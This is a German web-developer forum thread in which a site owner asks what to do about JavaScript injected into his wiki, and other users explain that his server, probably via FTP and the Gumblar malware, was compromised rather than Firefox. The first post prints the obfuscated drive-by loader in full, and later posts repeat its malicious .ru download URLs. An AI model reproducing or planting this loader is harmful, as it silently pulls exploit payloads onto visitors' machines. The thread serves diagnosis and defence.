Michael: Exploit im Firefox mittels javascript - was machen?

Hi,

irgendwie hat es jemand geschafft auf meiner Seite folgenden JS Code zu installieren, der dann in firefox 3.5.5 fiese dinge macht.

<script>/*GNU GPL*/ try{window.onload = function(){var H3qqea3ur6p = document.createElement('script');H3qqea3ur6p.setAttribute('type', 'text/javascript');H3qqea3ur6p.setAttribute('id', 'myscript1');H3qqea3ur6p.setAttribute('src', 'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l^$!e$)@.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u#)$!(-!((m^!s$)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r#$#)t))@s#!#)a!l##e@(.))&r$!u!&):)8(0$)@$8^#^@0&)$^/!!&w@$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&^g@$(^o@(^o@g@&$l&&#e^))&@-($(m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^&(i$#@n!#^-#@)p$!!$h$!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$@c!&@o@m^)&/)!c&#(n$)e()&&t)#-^#!c^(@n^^n&#).)c!&!o$#m($/$^a&!@@b&()o^($(u!&#)t^#-#))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^'.replace(/\^|&|@|\)|\(|#|\!|\$/ig, ''));H3qqea3ur6p.setAttribute('defer', 'defer');document.body.appendChild(H3qqea3ur6p);}} catch(e) {}</script>

Der Code generiert dann folgenden Link und läd irgendwas runter, wobei aber mein Virenprogramm aufmerksam wird:

http://live.com.google.com.baidu-msn.com.bestartsale.ru:8080/wordpress.com/google-mail.it/livejasmin-photobucket.com/cnet-cnn.com/about-ebay.com/

Was kann ich machen? Ich meine, hiervon sollte doch die FF community becheid wissen, und auch AntiViren Leute... Gibts da sowas wie eine Meldestelle?

Vielen Dank
Michael

  1. ACHTUNG: Code bitte auf keinen Fall ausführen!

  2. Hi,

    irgendwie hat es jemand geschafft auf meiner Seite folgenden JS Code zu installieren, der dann in firefox 3.5.5 fiese dinge macht.
    [...]
    Was kann ich machen?

    Die serverseitigen Scripte besser absichern, so dass niemand mehr Code einschleusen kann.

    Ich meine, hiervon sollte doch die FF community becheid wissen,

    Worüber? Dass deine Seite so mies programmiert ist, dass sie Code Injection auf irgendeine Weise ermöglicht?

    und auch AntiViren Leute...

    Die wissen doch schon Bescheid, wenn dein Antivirenprogramm Alarm gibt.

    MfG ChrisB

    --
    “Whoever best describes the problem is the person most likely to solve the problem.” [Dan Roam]
    1. Worüber? Dass deine Seite so mies programmiert ist, dass sie Code Injection auf irgendeine Weise ermöglicht?

      Nein, weil FF offensichtlich eine Sicherheitslücke hat, die Injections zuläßt! Die Software ('nen Wiki) dürften übrigens viele Leute auf Ihren Server haben, nicht nur ich...

      und auch AntiViren Leute...

      Die wissen doch schon Bescheid, wenn dein Antivirenprogramm Alarm gibt.

      -Klar- Aber mit dem Exploit kann jeder beliebige Code übertragen werden. Wenn also ein AV Prog den JS Code erkennt (man speicher sowas ja auch auf seinem lokalen Rechner) wäre das sicherlich sinnvoll.

      Viele Grüße
      Michael

      P.S:
      Mich nerven Leute ungemein, die nix zu der eigentlichen Frage zu sagen haben und nur rumlallen!

      1. Worüber? Dass deine Seite so mies programmiert ist, dass sie Code Injection auf irgendeine Weise ermöglicht?

        Nein, weil FF offensichtlich eine Sicherheitslücke hat, die Injections zuläßt! Die Software ('nen Wiki) dürften übrigens viele Leute auf Ihren Server haben, nicht nur ich...

        Dann haben die das gleich Problem. Die Lücke hat definitiv nicht der Browser, wenn auf deiner Seite jemand solchen Code deponieren kann.

        Struppi.

      2. Hi,

        Worüber? Dass deine Seite so mies programmiert ist, dass sie Code Injection auf irgendeine Weise ermöglicht?

        Nein, weil FF offensichtlich eine Sicherheitslücke hat, die Injections zuläßt!

        Wie kommst du denn auf die Idee, dass die Injection clientseitig stattfinden würde?

        Mich nerven Leute ungemein, die nix zu der eigentlichen Frage zu sagen haben und nur rumlallen!

        Mich nerven Leute, die weder Antworten verstehen, noch sinnvolle Fragen zu stellen in der Lage sind.

        Vielleicht liest du mal die Tipps für Fragende und lieferst anschliessend eine brauchbare Problembeschreibung, bevor du hier so rumkotzt.

        MfG ChrisB

        --
        “Whoever best describes the problem is the person most likely to solve the problem.” [Dan Roam]
        1. Nochmal ganz langsamen und zum mitschreiben:

          Der Firefox wird missbraucht um:

          1. Schad-Code runterzuladen (ohne das der User davon was merkt)
          2. diesen Schad-Code (also .exe, .com, etc.) auszuführen (ohne das der User davon was merkt)

          Das nenne ich eine Sicherheitslücke! Das passiert im Browser. Das ist clientseitig. Wenn Du auf meiner oder einer anderen Seite surfst bekommst Du also den Exploit ungefragt installiert. Bitteschön, gerne geschehen. Dass der Schad-JS-Code auf meiner oder einer anderen Seite injiziert wurde hat damit nix zu tun (die Wikisoftware hat zwar eine Sicherheitslücke, aber die wird/ist meines Wissens schon behoben).

          Wenn jemand meine eigentliche Frage (ich denke sie war ziemlich eindeutig) beantworten könnte, wäre ich glücklich.

          Viele Grüße
          Michael

          1. Nochmal ganz langsamen und zum mitschreiben:

            Das solltest du tun.

            Der Firefox wird missbraucht um:

            Nein wird er nicht, deine Serversoftware wurde dazu mißbraucht auf deiner Seite Schadcode zu platzieren.

            1. Schad-Code runterzuladen (ohne das der User davon was merkt)

            Das ist eine Einstellung die du in deinem Browser so vorgenommen hast, bei mir ist es nicht so.

            1. diesen Schad-Code (also .exe, .com, etc.) auszuführen (ohne das der User davon was merkt)

            Das kann definitiv nicht sein oder auf deinem System stimmt was nicht.

            Das nenne ich eine Sicherheitslücke! Das passiert im Browser. Das ist clientseitig. Wenn Du auf meiner oder einer anderen Seite surfst bekommst Du also den Exploit ungefragt installiert. Bitteschön, gerne geschehen. Dass der Schad-JS-Code auf meiner oder einer anderen Seite injiziert wurde hat damit nix zu tun

            Natürlich hat es was damit zu tun und natürlich ist es eine Sicherheitslücke, aber nicht im Browser.

            Wenn jemand meine eigentliche Frage (ich denke sie war ziemlich eindeutig) beantworten könnte, wäre ich glücklich.

            Dann müßtest du sehr glücklich sein, da deine Frage schon so oft beantwortet wurde.

            Struppi.

      3. Hallo,

        Worüber? Dass deine Seite so mies programmiert ist, dass sie Code Injection auf irgendeine Weise ermöglicht?

        Nein, weil FF offensichtlich eine Sicherheitslücke hat, die Injections zuläßt! Die Software ('nen Wiki) dürften übrigens viele Leute auf Ihren Server haben, nicht nur ich...

        Die anderen haben schon recht: Der Code ist höchstwahrscheinlich nicht durch eine Browser-Lücke auf deine Seiten geraten, sondern jemand hat die Serversoftware gehackt. Du müsstest also den Hersteller Serversoftware (dich selbst?) informieren, nicht den des Browsers, denn bei dem wirst du auf taube Ohren stoßen:

        Die Sicherheitslücke (= die Möglichkeit von Cross-Site Scripting) besteht zwar in allen JS-fähigen Browsern und ist eigentlich bekannt, wird aber aus kommerziellen Gründen nicht wirklich als Sicherheitslücke angesehen, weil sich sonst Werbung nicht mehr so einfach verbreiten ließe, wenn man die Lücke stopfte, z.B. durch eine restriktivere SOP.

        Der von dir gepostete Schadcode führt ein Script aus von http://live.com.google.com.baidu-msn.com.bestartsale.ru:8080/wordpress.com/google-mail.it/livejasmin-photobucket.com/cnet-cnn.com/about-ebay.com/
        welches in einem verstecken iframe wiederum den URL http://live.com.google.com.baidu-msn.com.bestartsale.ru:8080/index.php?js lädt. Was letzterer macht, ist mir nicht klar. Wenn man ihn aufruft, erscheint eine komplett leere Seite ^^.

        Gruß, Don P

        1. Hi,

          Die Sicherheitslücke (= die Möglichkeit von Cross-Site Scripting) besteht zwar in allen JS-fähigen Browsern und ist eigentlich bekannt, wird aber aus kommerziellen Gründen nicht wirklich als Sicherheitslücke angesehen, weil sich sonst Werbung nicht mehr so einfach verbreiten ließe, wenn man die Lücke stopfte, z.B. durch eine restriktivere SOP.

          Du wirst wohl nie müde, diesen Blödsinn zu wiederholen?

          Zum x-ten Mal: Von XSS kann man eigentlich nur dann reden, wenn die Einbindung von Code nicht vom Seitenautor beabsichtigt ist.

          MfG ChrisB

          --
          “Whoever best describes the problem is the person most likely to solve the problem.” [Dan Roam]
          1. Hallo,

            Du wirst wohl nie müde, diesen Blödsinn zu wiederholen?

            Nein.

            Zum x-ten Mal: Von XSS kann man eigentlich nur dann reden, wenn die Einbindung von Code nicht vom Seitenautor beabsichtigt ist.

            Wie in diesem Fall. Zum x-ten Mal: Das das überhaupt möglich ist, ist doch gerade das Problem, bzw. dass es nicht abgestellt wird.

            Gruß, Don P

            1. Hi,

              Zum x-ten Mal: Von XSS kann man eigentlich nur dann reden, wenn die Einbindung von Code nicht vom Seitenautor beabsichtigt ist.

              Wie in diesem Fall. Zum x-ten Mal: Das das überhaupt möglich ist, ist doch gerade das Problem, bzw. dass es nicht abgestellt wird.

              Struppi hat dir vorher auch schon mal erklärt, dass es blödsinnig wäre, dieses Feature abzustellen.

              MfG ChrisB

              --
              “Whoever best describes the problem is the person most likely to solve the problem.” [Dan Roam]
        2. Die Sicherheitslücke (= die Möglichkeit von Cross-Site Scripting) besteht zwar in allen JS-fähigen Browsern und ist eigentlich bekannt, wird aber aus kommerziellen Gründen nicht wirklich als Sicherheitslücke angesehen, weil ...

          ... so das internet funktioniert, man betrachtet Inhalte im Browser von anderen Servern. Du kannst auch Flash oder Java Code und sogar Bilder von einer fremden Domain einbinden, willst du das unterbinden?

          Wie wir schon mal diskutiert haben, es ist deine Entscheidung Skripte von einer fremden Domain einzubinden oder nicht. Aber seit wann wird XSS nicht als Sicherheitslücke gesehen?

          Struppi.

          1. Hallo,

            ... so das internet funktioniert, man betrachtet Inhalte im Browser von anderen Servern. Du kannst auch Flash oder Java Code und sogar Bilder von einer fremden Domain einbinden, willst du das unterbinden?

            Ja, das wäre konsequent. Bilder wären ok, aber nichts, was Code ausführt, der nicht unter der Kontrolle des Seitenbetreibers liegt. Wenn der es haben will, soll er den Fremdcode eben kopieren auf seinen Server, wo er ihn unter Kontrolle hat.

            Aber seit wann wird XSS nicht als Sicherheitslücke gesehen?

            XSS oder nichts XSS. Das ist doch Haarspalterei. Wenn fremder Code eingebunden wird, ob absichtlich oder nicht, dann *ist* das Cross-Site Scripting, jedenfalls im Wortsinn. Und es *ist* nunmal ein Risiko, auch wenn es beabsichtigt ist, weil der Fremdcode eben nicht unter der Kontrolle des Seitenbetreibers liegt und weiteren Code einbinden kann, der wiederum nicht unter der Kontrolle des 1. Fremdcodes liegt usw. usf.

            Verstehe nicht, wie man das anders sehen kann.

            Gruß, Don P

            1. Hi,

              Ja, das wäre konsequent. Bilder wären ok, aber nichts, was Code ausführt, der nicht unter der Kontrolle des Seitenbetreibers liegt. Wenn der es haben will, soll er den Fremdcode eben kopieren auf seinen Server, wo er ihn unter Kontrolle hat.

              Na also, dann halte dich doch einfach an diese Maxime - und für dich als Seitenbetreiber existiert *überhaupt* *kein* Problem mehr.

              Wenn fremder Code eingebunden wird, ob absichtlich oder nicht, dann *ist* das Cross-Site Scripting, jedenfalls im Wortsinn. Und es *ist* nunmal ein Risiko, auch wenn es beabsichtigt ist, weil der Fremdcode eben nicht unter der Kontrolle des Seitenbetreibers liegt

              Dann binde ihn nicht ein, fertig aus basta.

              Verstehe nicht, wie man das anders sehen kann.

              Ich verstehe nicht, wieso du partout nicht kapieren willst, dass es als Seitenbetreiber allein an dir liegt, ob du Fremdcode einbindest oder nicht.

              MfG ChrisB

              --
              “Whoever best describes the problem is the person most likely to solve the problem.” [Dan Roam]
        3. welches in einem verstecken iframe wiederum den URL http://live.com.google.com.baidu-msn.com.bestartsale.ru:8080/index.php?js lädt. Was letzterer macht, ist mir nicht klar. Wenn man ihn aufruft, erscheint eine komplett leere Seite ^^.

          Ja genau, soweit war ich auch. Was dann genau passiert ist mir auch nicht klar, bloß, dass als Resultat unter C:\Dokumente und Einstellungen\michael\Lokale Einstellungen\Temp\plugtmp Dateien heruntergeladen werden. (u.a. waren es jars und pdf, glaube ich). Bei der pdf
          hat mein AV geklingelt...

          Grüße, Michael

          1. Hallo,

            Bei der pdf
            hat mein AV geklingelt...

            dann ist es vermutlich diese Lücke die ausgenutzt werden soll ...
            Zero-Day-Lücke in Adobe Reader und Acrobat

            Grüße, Jochen

            --
            Kritzeln statt texten: Scribbleboard
            1. dann ist es vermutlich diese Lücke die ausgenutzt werden soll ...
              Zero-Day-Lücke in Adobe Reader und Acrobat

              Das war die alte Lücke, es gibt mittlerweile eine neuere (09.10.2009)
              Adobe-Anwender erneut unter Beschuss

              Grüße, Jochen

              --
              Kritzeln statt texten: Scribbleboard
            2. Hmm, mag sein, aber warum dann die jars und warum werden sie in einem Ordner plugtmp gespeichert? Fragen über Fragen...die wahrscheinlich nur Fachleute beantworten können.

              Ich glaube eher dass das Exploit schon ausgeführt wurde. Warum liegt es auch im Ordner ...\Temp\plugtmp? Werden da PDFs temorär gespeichert?

              Viele Grüße
              Michael

              1. Hmm, mag sein, aber warum dann die jars und warum werden sie in einem Ordner plugtmp gespeichert?

                Das ist unerheblich - die meisten exploits die "irgendwas" ausführen, sind nicht schädlich - sie zielen auf irgend eine Sicherheitslücke ab, die in deinem Fall vielleicht garnicht relevant ist.

                Man hat vermutlich nur simpel mit einem Bot den Code in deine Seite eingeschleust - dort wird er in deine HTML-Dokumente eingefügt und von vielen Clients ausgeführt.

                Dem Angreifer ist scheissegal ob der Client diese Lücke hat, hatte oder garnie davon betroffen sein wird (z.B. falsches Betriebssystem). Wenn bei 200 Millionen aufrufen nur 100 dabei sind, bei denen die Software greift, hat er sein Botnetz um ein paar "Helfer" erweitert.

                So einfach ist das.

                Warum also was wohin gespeichert wird und du nicht verstehst, was das eigentlich soll, ist unerheblich - wichtig ist: sorge dafür, dass das nicht wieder passiert und stopfe entsprechende Sicherheitslücken in deiner Webanwendung.

      4. Nein, weil FF offensichtlich eine Sicherheitslücke hat, die Injections zuläßt! Die Software ('nen Wiki) dürften übrigens viele Leute auf Ihren Server haben, nicht nur ich...

        Kann es evtl. sein, dass nicht die Software gecrackt wurde, sondern der Server?
        Ich finde das Ding, was du dir da gefangen hast nämlich auch auf normalen Webseiten.

        Struppi.

        1. Nein, weil FF offensichtlich eine Sicherheitslücke hat, die Injections zuläßt! Die Software ('nen Wiki) dürften übrigens viele Leute auf Ihren Server haben, nicht nur ich...

          Kann es evtl. sein, dass nicht die Software gecrackt wurde, sondern der Server?
          Ich finde das Ding, was du dir da gefangen hast nämlich auch auf normalen Webseiten.

          Ich vermute mal nach Nachforschungen, es ist dein FTP Server - zu schwaches Passwort? - der gehackt wurde, denn du verbreitest den Gumblar Virus

          Struppi.